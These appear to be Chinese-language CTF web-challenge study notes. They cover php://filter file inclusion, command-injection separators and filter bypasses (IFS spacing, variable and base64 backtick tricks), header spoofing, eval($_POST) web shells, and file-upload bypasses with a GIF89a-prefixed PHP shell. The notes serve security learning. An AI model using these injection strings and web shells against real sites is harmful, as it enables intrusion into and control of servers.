文件包含
include()
利用filter协议,对文本进行特定处理(加密),达到绕过注释的特点。
格式:
resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。
read=<读链的筛选列表> 可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表> 可以设定一个或多个过滤器名称,以管道符(|)分隔。
例子:
?file=php://filter/read=convert.base64-encode/resource=flag.php
参考文章:https://blog.csdn.net/destiny1507/article/details/82347371
命令执行
https://blog.csdn.net/LYJ20010728/article/details/117349106
命令联合执行,用命令拼接符执行漏洞命令
; 前面的执行完执行后面的
| 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)
|| 当前面的执行出错时(为假)执行后面的
& 将任务置于后台执行
&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真
%0a (换行)
%0d (回车)
参考文章:https://blog.csdn.net/vanarrow/article/details/108295481
例子: 127.0.0.1 & ls
空格绕过:
${IFS}$9
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
<
<>
%20 (space)
%09 (tab)
flag绕过:
利用变量赋值代替flag字符。
例子:
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
反引号会将其内容执行后,将结果替换到命令行中.
base64编码: |base64 -d
例子:
?ip=127.0.0.1;cat$IFS$1`echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d`
http协议标签:(参考文章:https://blog.csdn.net/faramita_of_mine/article/details/123141726)
Host(发送请求时,该报头域是必需的)
请求报头域主要用于指定被请求资源的Internet主机和端口号,它通常从HTTP URL中提取出来的
Referer
当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。
User-Agent(伪造访问工具、 浏览器)
os、浏览器种类、版本信息
X-Forwarded-For(伪造本地ip,X-Forwarded-For:127.0.0.1)
在一些大型网站中,来自用户的HTTP请求会经过反向代理服务器的转发,此时,服务器收到的Remote Address地址就是反向代理服务器的地址。在这样的情况下,用户的真实IP地址将被丢失,因此有了HTTP扩展头部X-Forward-For。(参考:https://blog.csdn.net/yizhenn/article/details/60955599)
Content-Type(文件上传,绕过文件类型白名单)
用于定义网络文件的类型和网页的编码,决定文件接收方将以什么形式、什么编码读取这个文件
eval($_POST[“Syc”]);
**eval是PHP代码执行函数,**把字符串按照 PHP 代码来执行。
$_POST PHP方法将参数Syc作为POST传参方式
可以理解为题目作者已经给我们了连接服务器的密码Syc,我们只需要使用工具连接题目地址就可以啦
upload
upload是有着后缀名检查,文件类型检查,文件解析等多个点排除。
1.上传一个php文件看看过滤点
2.文件类型检查:抓包改变文件类型
Content-Type: image/jpeg
3.后缀检查:改成大小写或加数字,例如php2,Php等,或者phtml或pht,实在不行还可以尝试asp只不过要注意在蚁剑里面修改连接类型。
4.文件内容解析 :
<? 被过滤:
GIF89a? <script language="php">eval($_REQUEST[1])</scrip 作者:很菜的wl https://www.bilibili.com/read/cv18094393/ 出处:bilibili
网站备份文件泄露:
利用dirsearch搜索
常见的网站源码备份文件后缀:
tar.gz,zip,rar,tar
常见的网站源码备份文件名:
web,website,backup,back,www,wwwroot,temp
js弹窗绕过:
一、删除js弹窗代码
二、关闭js弹窗
浏览器搜about:config
搜索javascript,关掉即可